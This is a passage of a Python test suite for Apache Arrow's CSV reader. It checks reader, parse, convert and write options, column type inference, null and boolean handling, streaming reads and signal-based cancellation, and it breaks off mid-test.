letters = string.ascii_lowercase
yield from letters
for first in letters:
for second in letters:
yield first + second
def make_random_csv(num_cols=2, num_rows=10, linesep='\r\n', write_names=True):
arr = np.random.RandomState(42).randint(0, 1000, size=(num_cols, num_rows))
csv = io.StringIO()
col_names = list(itertools.islice(generate_col_names(), num_cols))
if write_names:
csv.write(",".join(col_names))
csv.write(linesep)
for row in arr.T:
csv.write(",".join(map(str, row)))
csv.write(linesep)
csv = csv.getvalue().encode()
columns = [pa.array(a, type=pa.int64()) for a in arr]
expected = pa.Table.from_arrays(columns, col_names)
return csv, expected
def make_empty_csv(column_names):
csv = io.StringIO()
csv.write(",".join(column_names))
csv.write("\n")
return csv.getvalue().encode()
def check_options_class(cls, **attr_values):
"""
Check setting and getting attributes of an *Options class.
"""
opts = cls()
for name, values in attr_values.items():
assert getattr(opts, name) == values[0], \
"incorrect default value for " + name
for v in values:
setattr(opts, name, v)
assert getattr(opts, name) == v, "failed setting value"
with pytest.raises(AttributeError):
opts.zzz_non_existent = True
# Check constructor named arguments
non_defaults = {name: values[1] for name, values in attr_values.items()}
opts = cls(**non_defaults)
for name, value in non_defaults.items():
assert getattr(opts, name) == value
# The various options classes need to be picklable for dataset
def check_options_class_pickling(cls, **attr_values):
opts = cls(**attr_values)
new_opts = pickle.loads(pickle.dumps(opts,
protocol=pickle.HIGHEST_PROTOCOL))
for name, value in attr_values.items():
assert getattr(new_opts, name) == value
def test_read_options():
cls = ReadOptions
opts = cls()
check_options_class(cls, use_threads=[True, False],
skip_rows=[0, 3],
column_names=[[], ["ab", "cd"]],
autogenerate_column_names=[False, True],
encoding=['utf8', 'utf16'])
check_options_class_pickling(cls, use_threads=True,
skip_rows=3,
column_names=["ab", "cd"],
autogenerate_column_names=False,
encoding='utf16')
assert opts.block_size > 0
opts.block_size = 12345
assert opts.block_size == 12345
opts = cls(block_size=1234)
assert opts.block_size == 1234
def test_parse_options():
cls = ParseOptions
check_options_class(cls, delimiter=[',', 'x'],
escape_char=[False, 'y'],
quote_char=['"', 'z', False],
double_quote=[True, False],
newlines_in_values=[False, True],
ignore_empty_lines=[True, False])
check_options_class_pickling(cls, delimiter='x',
escape_char='y',
quote_char=False,
double_quote=False,
newlines_in_values=True,
ignore_empty_lines=False)
def test_convert_options():
cls = ConvertOptions
opts = cls()
check_options_class(
cls, check_utf8=[True, False],
strings_can_be_null=[False, True],
include_columns=[[], ['def', 'abc']],
include_missing_columns=[False, True],
auto_dict_encode=[False, True],
timestamp_parsers=[[], [ISO8601, '%y-%m']])
check_options_class_pickling(
cls, check_utf8=True,
strings_can_be_null=False,
include_columns=['def', 'abc'],
include_missing_columns=False,
auto_dict_encode=True,
timestamp_parsers=[ISO8601, '%y-%m'])
assert opts.auto_dict_max_cardinality > 0
opts.auto_dict_max_cardinality = 99999
assert opts.auto_dict_max_cardinality == 99999
assert opts.column_types == {}
# Pass column_types as mapping
opts.column_types = {'b': pa.int16(), 'c': pa.float32()}
assert opts.column_types == {'b': pa.int16(), 'c': pa.float32()}
opts.column_types = {'v': 'int16', 'w': 'null'}
assert opts.column_types == {'v': pa.int16(), 'w': pa.null()}
# Pass column_types as schema
schema = pa.schema([('a', pa.int32()), ('b', pa.string())])
opts.column_types = schema
assert opts.column_types == {'a': pa.int32(), 'b': pa.string()}
# Pass column_types as sequence
opts.column_types = [('x', pa.binary())]
assert opts.column_types == {'x': pa.binary()}
with pytest.raises(TypeError, match='DataType expected'):
opts.column_types = {'a': None}
with pytest.raises(TypeError):
opts.column_types = 0
assert isinstance(opts.null_values, list)
assert '' in opts.null_values
assert 'N/A' in opts.null_values
opts.null_values = ['xxx', 'yyy']
assert opts.null_values == ['xxx', 'yyy']
assert isinstance(opts.true_values, list)
opts.true_values = ['xxx', 'yyy']
assert opts.true_values == ['xxx', 'yyy']
assert isinstance(opts.false_values, list)
opts.false_values = ['xxx', 'yyy']
assert opts.false_values == ['xxx', 'yyy']
assert opts.timestamp_parsers == []
opts.timestamp_parsers = [ISO8601]
assert opts.timestamp_parsers == [ISO8601]
opts = cls(column_types={'a': pa.null()},
null_values=['N', 'nn'], true_values=['T', 'tt'],
false_values=['F', 'ff'], auto_dict_max_cardinality=999,
timestamp_parsers=[ISO8601, '%Y-%m-%d'])
assert opts.column_types == {'a': pa.null()}
assert opts.null_values == ['N', 'nn']
assert opts.false_values == ['F', 'ff']
assert opts.true_values == ['T', 'tt']
assert opts.auto_dict_max_cardinality == 999
assert opts.timestamp_parsers == [ISO8601, '%Y-%m-%d']
def test_write_options():
cls = WriteOptions
opts = cls()
check_options_class(
cls, include_header=[True, False])
assert opts.batch_size > 0
opts.batch_size = 12345
assert opts.batch_size == 12345
opts = cls(batch_size=9876)
assert opts.batch_size == 9876
class BaseTestCSVRead:
def read_bytes(self, b, **kwargs):
return self.read_csv(pa.py_buffer(b), **kwargs)
def check_names(self, table, names):
assert table.num_columns == len(names)
assert table.column_names == names
def test_file_object(self):
data = b"a,b\n1,2\n"
expected_data = {'a': [1], 'b': [2]}
bio = io.BytesIO(data)
table = self.read_csv(bio)
assert table.to_pydict() == expected_data
# Text files not allowed
sio = io.StringIO(data.decode())
with pytest.raises(TypeError):
self.read_csv(sio)
def test_header(self):
rows = b"abc,def,gh\n"
table = self.read_bytes(rows)
assert isinstance(table, pa.Table)
self.check_names(table, ["abc", "def", "gh"])
assert table.num_rows == 0
def test_bom(self):
rows = b"\xef\xbb\xbfa,b\n1,2\n"
expected_data = {'a': [1], 'b': [2]}
table = self.read_bytes(rows)
assert table.to_pydict() == expected_data
def test_one_chunk(self):
# ARROW-7661: lack of newline at end of file should not produce
# an additional chunk.
rows = [b"a,b", b"1,2", b"3,4", b"56,78"]
for line_ending in [b'\n', b'\r', b'\r\n']:
for file_ending in [b'', line_ending]:
data = line_ending.join(rows) + file_ending
table = self.read_bytes(data)
assert len(table.to_batches()) == 1
assert table.to_pydict() == {
"a": [1, 3, 56],
"b": [2, 4, 78],
}
def test_header_skip_rows(self):
rows = b"ab,cd\nef,gh\nij,kl\nmn,op\n"
opts = ReadOptions()
opts.skip_rows = 1
table = self.read_bytes(rows, read_options=opts)
self.check_names(table, ["ef", "gh"])
assert table.to_pydict() == {
"ef": ["ij", "mn"],
"gh": ["kl", "op"],
}
opts.skip_rows = 3
table = self.read_bytes(rows, read_options=opts)
self.check_names(table, ["mn", "op"])
assert table.to_pydict() == {
"mn": [],
"op": [],
}
opts.skip_rows = 4
with pytest.raises(pa.ArrowInvalid):
# Not enough rows
table = self.read_bytes(rows, read_options=opts)
# Can skip rows with a different number of columns
rows = b"abcd\n,,,,,\nij,kl\nmn,op\n"
opts.skip_rows = 2
table = self.read_bytes(rows, read_options=opts)
self.check_names(table, ["ij", "kl"])
assert table.to_pydict() == {
"ij": ["mn"],
"kl": ["op"],
}
def test_header_column_names(self):
rows = b"ab,cd\nef,gh\nij,kl\nmn,op\n"
opts = ReadOptions()
opts.column_names = ["x", "y"]
table = self.read_bytes(rows, read_options=opts)
self.check_names(table, ["x", "y"])
assert table.to_pydict() == {
"x": ["ab", "ef", "ij", "mn"],
"y": ["cd", "gh", "kl", "op"],
}
opts.skip_rows = 3
table = self.read_bytes(rows, read_options=opts)
self.check_names(table, ["x", "y"])
assert table.to_pydict() == {
"x": ["mn"],
"y": ["op"],
}
opts.skip_rows = 4
table = self.read_bytes(rows, read_options=opts)
self.check_names(table, ["x", "y"])
assert table.to_pydict() == {
"x": [],
"y": [],
}
opts.skip_rows = 5
with pytest.raises(pa.ArrowInvalid):
# Not enough rows
table = self.read_bytes(rows, read_options=opts)
# Unexpected number of columns
opts.skip_rows = 0
opts.column_names = ["x", "y", "z"]
with pytest.raises(pa.ArrowInvalid,
match="Expected 3 columns, got 2"):
table = self.read_bytes(rows, read_options=opts)
# Can skip rows with a different number of columns
rows = b"abcd\n,,,,,\nij,kl\nmn,op\n"
opts.skip_rows = 2
opts.column_names = ["x", "y"]
table = self.read_bytes(rows, read_options=opts)
self.check_names(table, ["x", "y"])
assert table.to_pydict() == {
"x": ["ij", "mn"],
"y": ["kl", "op"],
}
def test_header_autogenerate_column_names(self):
rows = b"ab,cd\nef,gh\nij,kl\nmn,op\n"
opts = ReadOptions()
opts.autogenerate_column_names = True
table = self.read_bytes(rows, read_options=opts)
self.check_names(table, ["f0", "f1"])
assert table.to_pydict() == {
"f0": ["ab", "ef", "ij", "mn"],
"f1": ["cd", "gh", "kl", "op"],
}
opts.skip_rows = 3
table = self.read_bytes(rows, read_options=opts)
self.check_names(table, ["f0", "f1"])
assert table.to_pydict() == {
"f0": ["mn"],
"f1": ["op"],
}
# Not enough rows, impossible to infer number of columns
opts.skip_rows = 4
with pytest.raises(pa.ArrowInvalid):
table = self.read_bytes(rows, read_options=opts)
def test_include_columns(self):
rows = b"ab,cd\nef,gh\nij,kl\nmn,op\n"
convert_options = ConvertOptions()
convert_options.include_columns = ['ab']
table = self.read_bytes(rows, convert_options=convert_options)
self.check_names(table, ["ab"])
assert table.to_pydict() == {
"ab": ["ef", "ij", "mn"],
}
# Order of include_columns is respected, regardless of CSV order
convert_options.include_columns = ['cd', 'ab']
table = self.read_bytes(rows, convert_options=convert_options)
schema = pa.schema([('cd', pa.string()),
('ab', pa.string())])
assert table.schema == schema
assert table.to_pydict() == {
"cd": ["gh", "kl", "op"],
"ab": ["ef", "ij", "mn"],
}
# Include a column not in the CSV file => raises by default
convert_options.include_columns = ['xx', 'ab', 'yy']
with pytest.raises(KeyError,
match="Column 'xx' in include_columns "
"does not exist in CSV file"):
self.read_bytes(rows, convert_options=convert_options)
def test_include_missing_columns(self):
rows = b"ab,cd\nef,gh\nij,kl\nmn,op\n"
read_options = ReadOptions()
convert_options = ConvertOptions()
convert_options.include_columns = ['xx', 'ab', 'yy']
convert_options.include_missing_columns = True
table = self.read_bytes(rows, read_options=read_options,
convert_options=convert_options)
schema = pa.schema([('xx', pa.null()),
('ab', pa.string()),
('yy', pa.null())])
assert table.schema == schema
assert table.to_pydict() == {
"xx": [None, None, None],
"ab": ["ef", "ij", "mn"],
"yy": [None, None, None],
}
# Combining with `column_names`
read_options.column_names = ["xx", "yy"]
convert_options.include_columns = ["yy", "cd"]
table = self.read_bytes(rows, read_options=read_options,
convert_options=convert_options)
schema = pa.schema([('yy', pa.string()),
('cd', pa.null())])
assert table.schema == schema
assert table.to_pydict() == {
"yy": ["cd", "gh", "kl", "op"],
"cd": [None, None, None, None],
}
# And with `column_types` as well
convert_options.column_types = {"yy": pa.binary(),
"cd": pa.int32()}
table = self.read_bytes(rows, read_options=read_options,
convert_options=convert_options)
schema = pa.schema([('yy', pa.binary()),
('cd', pa.int32())])
assert table.schema == schema
assert table.to_pydict() == {
"yy": [b"cd", b"gh", b"kl", b"op"],
"cd": [None, None, None, None],
}
def test_simple_ints(self):
# Infer integer columns
rows = b"a,b,c\n1,2,3\n4,5,6\n"
table = self.read_bytes(rows)
schema = pa.schema([('a', pa.int64()),
('b', pa.int64()),
('c', pa.int64())])
assert table.schema == schema
assert table.to_pydict() == {
'a': [1, 4],
'b': [2, 5],
'c': [3, 6],
}
def test_simple_varied(self):
# Infer various kinds of data
rows = b"a,b,c,d\n1,2,3,0\n4.0,-5,foo,True\n"
table = self.read_bytes(rows)
schema = pa.schema([('a', pa.float64()),
('b', pa.int64()),
('c', pa.string()),
('d', pa.bool_())])
assert table.schema == schema
assert table.to_pydict() == {
'a': [1.0, 4.0],
'b': [2, -5],
'c': ["3", "foo"],
'd': [False, True],
}
def test_simple_nulls(self):
# Infer various kinds of data, with nulls
rows = (b"a,b,c,d,e,f\n"
b"1,2,,,3,N/A\n"
b"nan,-5,foo,,nan,TRUE\n"
b"4.5,#N/A,nan,,\xff,false\n")
table = self.read_bytes(rows)
schema = pa.schema([('a', pa.float64()),
('b', pa.int64()),
('c', pa.string()),
('d', pa.null()),
('e', pa.binary()),
('f', pa.bool_())])
assert table.schema == schema
assert table.to_pydict() == {
'a': [1.0, None, 4.5],
'b': [2, -5, None],
'c': ["", "foo", "nan"],
'd': [None, None, None],
'e': [b"3", b"nan", b"\xff"],
'f': [None, True, False],
}
def test_simple_timestamps(self):
# Infer a timestamp column
rows = (b"a,b,c\n"
b"1970,1970-01-01 00:00:00,1970-01-01 00:00:00.123\n"
b"1989,1989-07-14 01:00:00,1989-07-14 01:00:00.123456\n")
table = self.read_bytes(rows)
schema = pa.schema([('a', pa.int64()),
('b', pa.timestamp('s')),
('c', pa.timestamp('ns'))])
assert table.schema == schema
assert table.to_pydict() == {
'a': [1970, 1989],
'b': [datetime(1970, 1, 1), datetime(1989, 7, 14, 1)],
'c': [datetime(1970, 1, 1, 0, 0, 0, 123000),
datetime(1989, 7, 14, 1, 0, 0, 123456)],
}
def test_timestamp_parsers(self):
# Infer timestamps with custom parsers
rows = b"a,b\n1970/01/01,1980-01-01 00\n1970/01/02,1980-01-02 00\n"
opts = ConvertOptions()
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.string()),
('b', pa.timestamp('s'))])
assert table.schema == schema
assert table.to_pydict() == {
'a': ['1970/01/01', '1970/01/02'],
'b': [datetime(1980, 1, 1), datetime(1980, 1, 2)],
}
opts.timestamp_parsers = ['%Y/%m/%d']
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.timestamp('s')),
('b', pa.string())])
assert table.schema == schema
assert table.to_pydict() == {
'a': [datetime(1970, 1, 1), datetime(1970, 1, 2)],
'b': ['1980-01-01 00', '1980-01-02 00'],
}
opts.timestamp_parsers = ['%Y/%m/%d', ISO8601]
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.timestamp('s')),
('b', pa.timestamp('s'))])
assert table.schema == schema
assert table.to_pydict() == {
'a': [datetime(1970, 1, 1), datetime(1970, 1, 2)],
'b': [datetime(1980, 1, 1), datetime(1980, 1, 2)],
}
def test_dates(self):
# Dates are inferred as date32 by default
rows = b"a,b\n1970-01-01,1970-01-02\n1971-01-01,1971-01-02\n"
table = self.read_bytes(rows)
schema = pa.schema([('a', pa.date32()),
('b', pa.date32())])
assert table.schema == schema
assert table.to_pydict() == {
'a': [date(1970, 1, 1), date(1971, 1, 1)],
'b': [date(1970, 1, 2), date(1971, 1, 2)],
}
# Can ask for date types explicitly
opts = ConvertOptions()
opts.column_types = {'a': pa.date32(), 'b': pa.date64()}
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.date32()),
('b', pa.date64())])
assert table.schema == schema
assert table.to_pydict() == {
'a': [date(1970, 1, 1), date(1971, 1, 1)],
'b': [date(1970, 1, 2), date(1971, 1, 2)],
}
# Can ask for timestamp types explicitly
opts = ConvertOptions()
opts.column_types = {'a': pa.timestamp('s'), 'b': pa.timestamp('ms')}
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.timestamp('s')),
('b', pa.timestamp('ms'))])
assert table.schema == schema
assert table.to_pydict() == {
'a': [datetime(1970, 1, 1), datetime(1971, 1, 1)],
'b': [datetime(1970, 1, 2), datetime(1971, 1, 2)],
}
def test_auto_dict_encode(self):
opts = ConvertOptions(auto_dict_encode=True)
rows = "a,b\nab,1\ncdé,2\ncdé,3\nab,4".encode()
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.dictionary(pa.int32(), pa.string())),
('b', pa.int64())])
expected = {
'a': ["ab", "cdé", "cdé", "ab"],
'b': [1, 2, 3, 4],
}
assert table.schema == schema
assert table.to_pydict() == expected
opts.auto_dict_max_cardinality = 2
table = self.read_bytes(rows, convert_options=opts)
assert table.schema == schema
assert table.to_pydict() == expected
# Cardinality above max => plain-encoded
opts.auto_dict_max_cardinality = 1
table = self.read_bytes(rows, convert_options=opts)
assert table.schema == pa.schema([('a', pa.string()),
('b', pa.int64())])
assert table.to_pydict() == expected
# With invalid UTF8, not checked
opts.auto_dict_max_cardinality = 50
opts.check_utf8 = False
rows = b"a,b\nab,1\ncd\xff,2\nab,3"
table = self.read_bytes(rows, convert_options=opts,
validate_full=False)
assert table.schema == schema
dict_values = table['a'].chunk(0).dictionary
assert len(dict_values) == 2
assert dict_values[0].as_py() == "ab"
assert dict_values[1].as_buffer() == b"cd\xff"
# With invalid UTF8, checked
opts.check_utf8 = True
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.dictionary(pa.int32(), pa.binary())),
('b', pa.int64())])
expected = {
'a': [b"ab", b"cd\xff", b"ab"],
'b': [1, 2, 3],
}
assert table.schema == schema
assert table.to_pydict() == expected
def test_custom_nulls(self):
# Infer nulls with custom values
opts = ConvertOptions(null_values=['Xxx', 'Zzz'])
rows = b"a,b,c,d\nZzz,Xxx,1,2\nXxx,#N/A,,Zzz\n"
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.null()),
('b', pa.string()),
('c', pa.string()),
('d', pa.int64())])
assert table.schema == schema
assert table.to_pydict() == {
'a': [None, None],
'b': ["Xxx", "#N/A"],
'c': ["1", ""],
'd': [2, None],
}
opts = ConvertOptions(null_values=['Xxx', 'Zzz'],
strings_can_be_null=True)
table = self.read_bytes(rows, convert_options=opts)
assert table.to_pydict() == {
'a': [None, None],
'b': [None, "#N/A"],
'c': ["1", ""],
'd': [2, None],
}
opts = ConvertOptions(null_values=[])
rows = b"a,b\n#N/A,\n"
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.string()),
('b', pa.string())])
assert table.schema == schema
assert table.to_pydict() == {
'a': ["#N/A"],
'b': [""],
}
def test_custom_bools(self):
# Infer booleans with custom values
opts = ConvertOptions(true_values=['T', 'yes'],
false_values=['F', 'no'])
rows = (b"a,b,c\n"
b"True,T,t\n"
b"False,F,f\n"
b"True,yes,yes\n"
b"False,no,no\n"
b"N/A,N/A,N/A\n")
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.string()),
('b', pa.bool_()),
('c', pa.string())])
assert table.schema == schema
assert table.to_pydict() == {
'a': ["True", "False", "True", "False", "N/A"],
'b': [True, False, True, False, None],
'c': ["t", "f", "yes", "no", "N/A"],
}
def test_column_types(self):
# Ask for specific column types in ConvertOptions
opts = ConvertOptions(column_types={'b': 'float32',
'c': 'string',
'd': 'boolean',
'e': pa.decimal128(11, 2),
'zz': 'null'})
rows = b"a,b,c,d,e\n1,2,3,true,1.0\n4,-5,6,false,0\n"
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.int64()),
('b', pa.float32()),
('c', pa.string()),
('d', pa.bool_()),
('e', pa.decimal128(11, 2))])
expected = {
'a': [1, 4],
'b': [2.0, -5.0],
'c': ["3", "6"],
'd': [True, False],
'e': [Decimal("1.00"), Decimal("0.00")]
}
assert table.schema == schema
assert table.to_pydict() == expected
# Pass column_types as schema
opts = ConvertOptions(
column_types=pa.schema([('b', pa.float32()),
('c', pa.string()),
('d', pa.bool_()),
('e', pa.decimal128(11, 2)),
('zz', pa.bool_())]))
table = self.read_bytes(rows, convert_options=opts)
assert table.schema == schema
assert table.to_pydict() == expected
# One of the columns in column_types fails converting
rows = b"a,b,c,d,e\n1,XXX,3,true,5\n4,-5,6,false,7\n"
with pytest.raises(pa.ArrowInvalid) as exc:
self.read_bytes(rows, convert_options=opts)
err = str(exc.value)
assert "In CSV column #1: " in err
assert "CSV conversion error to float: invalid value 'XXX'" in err
def test_column_types_dict(self):
# Ask for dict-encoded column types in ConvertOptions
column_types = [
('a', pa.dictionary(pa.int32(), pa.utf8())),
('b', pa.dictionary(pa.int32(), pa.int64())),
('c', pa.dictionary(pa.int32(), pa.decimal128(11, 2))),
('d', pa.dictionary(pa.int32(), pa.large_utf8()))]
opts = ConvertOptions(column_types=dict(column_types))
rows = (b"a,b,c,d\n"
b"abc,123456,1.0,zz\n"
b"defg,123456,0.5,xx\n"
b"abc,N/A,1.0,xx\n")
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema(column_types)
expected = {
'a': ["abc", "defg", "abc"],
'b': [123456, 123456, None],
'c': [Decimal("1.00"), Decimal("0.50"), Decimal("1.00")],
'd': ["zz", "xx", "xx"],
}
assert table.schema == schema
assert table.to_pydict() == expected
# Unsupported index type
column_types[0] = ('a', pa.dictionary(pa.int8(), pa.utf8()))
opts = ConvertOptions(column_types=dict(column_types))
with pytest.raises(NotImplementedError):
table = self.read_bytes(rows, convert_options=opts)
def test_column_types_with_column_names(self):
# When both `column_names` and `column_types` are given, names
# in `column_types` should refer to names in `column_names`
rows = b"a,b\nc,d\ne,f\n"
read_options = ReadOptions(column_names=['x', 'y'])
convert_options = ConvertOptions(column_types={'x': pa.binary()})
table = self.read_bytes(rows, read_options=read_options,
convert_options=convert_options)
schema = pa.schema([('x', pa.binary()),
('y', pa.string())])
assert table.schema == schema
assert table.to_pydict() == {
'x': [b'a', b'c', b'e'],
'y': ['b', 'd', 'f'],
}
def test_no_ending_newline(self):
# No \n after last line
rows = b"a,b,c\n1,2,3\n4,5,6"
table = self.read_bytes(rows)
assert table.to_pydict() == {
'a': [1, 4],
'b': [2, 5],
'c': [3, 6],
}
def test_trivial(self):
# A bit pointless, but at least it shouldn't crash
rows = b",\n\n"
table = self.read_bytes(rows)
assert table.to_pydict() == {'': []}
def test_empty_lines(self):
rows = b"a,b\n\r1,2\r\n\r\n3,4\r\n"
table = self.read_bytes(rows)
assert table.to_pydict() == {
'a': [1, 3],
'b': [2, 4],
}
parse_options = ParseOptions(ignore_empty_lines=False)
table = self.read_bytes(rows, parse_options=parse_options)
assert table.to_pydict() == {
'a': [None, 1, None, 3],
'b': [None, 2, None, 4],
}
read_options = ReadOptions(skip_rows=2)
table = self.read_bytes(rows, parse_options=parse_options,
read_options=read_options)
assert table.to_pydict() == {
'1': [None, 3],
'2': [None, 4],
}
def test_invalid_csv(self):
# Various CSV errors
rows = b"a,b,c\n1,2\n4,5,6\n"
with pytest.raises(pa.ArrowInvalid, match="Expected 3 columns, got 2"):
self.read_bytes(rows)
rows = b"a,b,c\n1,2,3\n4"
with pytest.raises(pa.ArrowInvalid, match="Expected 3 columns, got 1"):
self.read_bytes(rows)
for rows in [b"", b"\n", b"\r\n", b"\r", b"\n\n"]:
with pytest.raises(pa.ArrowInvalid, match="Empty CSV file"):
self.read_bytes(rows)
def test_options_delimiter(self):
rows = b"a;b,c\nde,fg;eh\n"
table = self.read_bytes(rows)
assert table.to_pydict() == {
'a;b': ['de'],
'c': ['fg;eh'],
}
opts = ParseOptions(delimiter=';')
table = self.read_bytes(rows, parse_options=opts)
assert table.to_pydict() == {
'a': ['de,fg'],
'b,c': ['eh'],
}
def test_small_random_csv(self):
csv, expected = make_random_csv(num_cols=2, num_rows=10)
table = self.read_bytes(csv)
assert table.schema == expected.schema
assert table.equals(expected)
assert table.to_pydict() == expected.to_pydict()
def test_stress_block_sizes(self):
# Test a number of small block sizes to stress block stitching
csv_base, expected = make_random_csv(num_cols=2, num_rows=500)
block_sizes = [11, 12, 13, 17, 37, 111]
csvs = [csv_base, csv_base.rstrip(b'\r\n')]
for csv in csvs:
for block_size in block_sizes:
read_options = ReadOptions(block_size=block_size)
table = self.read_bytes(csv, read_options=read_options)
assert table.schema == expected.schema
if not table.equals(expected):
# Better error output
assert table.to_pydict() == expected.to_pydict()
def test_stress_convert_options_blowup(self):
# ARROW-6481: A convert_options with a very large number of columns
# should not blow memory and CPU time.
try:
clock = time.thread_time
except AttributeError:
clock = time.time
num_columns = 10000
col_names = ["K{}".format(i) for i in range(num_columns)]
csv = make_empty_csv(col_names)
t1 = clock()
convert_options = ConvertOptions(
column_types={k: pa.string() for k in col_names[::2]})
table = self.read_bytes(csv, convert_options=convert_options)
dt = clock() - t1
# Check that processing time didn't blow up.
# This is a conservative check (it takes less than 300 ms
# in debug mode on my local machine).
assert dt <= 10.0
# Check result
assert table.num_columns == num_columns
assert table.num_rows == 0
assert table.column_names == col_names
def test_cancellation(self):
if (threading.current_thread().ident !=
threading.main_thread().ident):
pytest.skip("test only works from main Python thread")
if sys.version_info >= (3, 8):
raise_signal = signal.raise_signal
elif os.name == 'nt':
# On Windows, os.kill() doesn't actually send a signal,
# it just terminates the process with the given exit code.
pytest.skip("test requires Python 3.8+ on Windows")
else:
# On Unix, emulate raise_signal() with os.kill().
def raise_signal(signum):
os.kill(os.getpid(), signum)
# Make the interruptible workload large enough to not finish
# before the interrupt comes, even in release mode on fast machines
large_csv = b"a,b,c\n" + b"1,2,3\n" * 200_000_000
def signal_from_thread():
time.sleep(0.2)
raise_signal(signal.SIGINT)
t1 = time.time()
try:
try:
t = threading.Thread(target=signal_from_thread)
with pytest.raises(KeyboardInterrupt) as exc_info:
t.start()
self.read_bytes(large_csv)
finally:
t.join()
except KeyboardInterrupt:
# In case KeyboardInterrupt didn't interrupt `self.read_bytes`
# above, at least prevent it from stopping the test suite
self.fail("KeyboardInterrupt didn't interrupt CSV reading")
dt = time.time() - t1
assert dt <= 1.0
e = exc_info.value.__context__
assert isinstance(e, pa.ArrowCancelled)
assert e.signum == signal.SIGINT
def test_cancellation_disabled(self):
# ARROW-12622: reader would segfault when the cancelling signal
# handler was not enabled (e.g. if disabled, or if not on the
# main thread)
t = threading.Thread(target=lambda: self.read_bytes(b"f64\n0.1"))
t.start()
t.join()
class TestSerialCSVRead(BaseTestCSVRead, unittest.TestCase):
def read_csv(self, *args, validate_full=True, **kwargs):
read_options = kwargs.setdefault('read_options', ReadOptions())
read_options.use_threads = False
table = read_csv(*args, **kwargs)
table.validate(full=validate_full)
return table
def test_row_numbers_in_errors(self):
""" Row numbers are only correctly counted in serial reads """
csv, _ = make_random_csv(4, 100, write_names=True)
read_options = ReadOptions()
read_options.block_size = len(csv) / 3
convert_options = ConvertOptions()
convert_options.column_types = {"a": pa.int32(), "d": pa.int32()}
# Test without skip_rows and column names in the csv
csv_bad_columns = csv + b"1,2\r\n"
with pytest.raises(pa.ArrowInvalid,
match="Row #102: Expected 4 columns, got 2"):
self.read_bytes(csv_bad_columns, read_options=read_options,
convert_options=convert_options)
csv_bad_type = csv + b"a,b,c,d\r\n"
message = ("In CSV column #0: Row #102: " +
"CSV conversion error to int32: invalid value 'a'")
with pytest.raises(pa.ArrowInvalid, match=message):
self.read_bytes(csv_bad_type, read_options=read_options,
convert_options=convert_options)
long_row = (b"this is a long row" * 15) + b",3\r\n"
csv_bad_columns_long = csv + long_row
message = ("Row #102: Expected 4 columns, got 2: " +
long_row[0:96].decode("utf-8") + " ...")
with pytest.raises(pa.ArrowInvalid, match=message):
self.read_bytes(csv_bad_columns_long, read_options=read_options,
convert_options=convert_options)
# Test without skip_rows and column names not in the csv
csv, _ = make_random_csv(4, 100, write_names=False)
read_options.column_names = ["a", "b", "c", "d"]
csv_bad_columns = csv + b"1,2\r\n"
with pytest.raises(pa.ArrowInvalid,
match="Row #101: Expected 4 columns, got 2"):
self.read_bytes(csv_bad_columns, read_options=read_options,
convert_options=convert_options)
csv_bad_columns_long = csv + long_row
message = ("Row #101: Expected 4 columns, got 2: " +
long_row[0:96].decode("utf-8") + " ...")
with pytest.raises(pa.ArrowInvalid, match=message):
self.read_bytes(csv_bad_columns_long, read_options=read_options,
convert_options=convert_options)
csv_bad_type = csv + b"a,b,c,d\r\n"
message = ("In CSV column #0: Row #101: " +
"CSV conversion error to int32: invalid value 'a'")
with pytest.raises(pa.ArrowInvalid, match=message):
self.read_bytes(csv_bad_type, read_options=read_options,
convert_options=convert_options)
# Test with skip_rows and column names not in the csv
read_options.skip_rows = 23
with pytest.raises(pa.ArrowInvalid,
match="Row #101: Expected 4 columns, got 2"):
self.read_bytes(csv_bad_columns, read_options=read_options,
convert_options=convert_options)
with pytest.raises(pa.ArrowInvalid, match=message):
self.read_bytes(csv_bad_type, read_options=read_options,
convert_options=convert_options)
class TestParallelCSVRead(BaseTestCSVRead, unittest.TestCase):
def read_csv(self, *args, validate_full=True, **kwargs):
read_options = kwargs.setdefault('read_options', ReadOptions())
read_options.use_threads = True
table = read_csv(*args, **kwargs)
table.validate(full=validate_full)
return table
class BaseTestStreamingCSVRead:
def open_bytes(self, b, **kwargs):
return self.open_csv(pa.py_buffer(b), **kwargs)
def check_reader(self, reader, expected_schema, expected_data):
assert reader.schema == expected_schema
batches = list(reader)
assert len(batches) == len(expected_data)
for batch, expected_batch in zip(batches, expected_data):
batch.validate(full=True)
assert batch.schema == expected_schema
assert batch.to_pydict() == expected_batch
def test_file_object(self):
data = b"a,b\n1,2\n3,4\n"
expected_data = {'a': [1, 3], 'b': [2, 4]}
bio = io.BytesIO(data)
reader = self.open_csv(bio)
expected_schema = pa.schema([('a', pa.int64()),
('b', pa.int64())])
self.check_reader(reader, expected_schema, [expected_data])
def test_header(self):
rows = b"abc,def,gh\n"
reader = self.open_bytes(rows)
expected_schema = pa.schema([('abc', pa.null()),
('def', pa.null()),
('gh', pa.null())])
self.check_reader(reader, expected_schema, [])
def test_inference(self):
# Inference is done on first block
rows = b"a,b\n123,456\nabc,de\xff\ngh,ij\n"
expected_schema = pa.schema([('a', pa.string()),
('b', pa.binary())])
read_options = ReadOptions()
read_options.block_size = len(rows)
reader = self.open_bytes(rows, read_options=read_options)
self.check_reader(reader, expected_schema,
[{'a': ['123', 'abc', 'gh'],
'b': [b'456', b'de\xff', b'ij']}])
read_options.block_size = len(rows) - 1
reader = self.open_bytes(rows, read_options=read_options)
self.check_reader(reader, expected_schema,
[{'a': ['123', 'abc'],
'b': [b'456', b'de\xff']},
{'a': ['gh'],
'b': [b'ij']}])
def test_inference_failure(self):
# Inference on first block, then conversion failure on second block
rows = b"a,b\n123,456\nabc,de\xff\ngh,ij\n"
read_options = ReadOptions()
read_options.block_size = len(rows) - 7
reader = self.open_bytes(rows, read_options=read_options)
expected_schema = pa.schema([('a', pa.int64()),
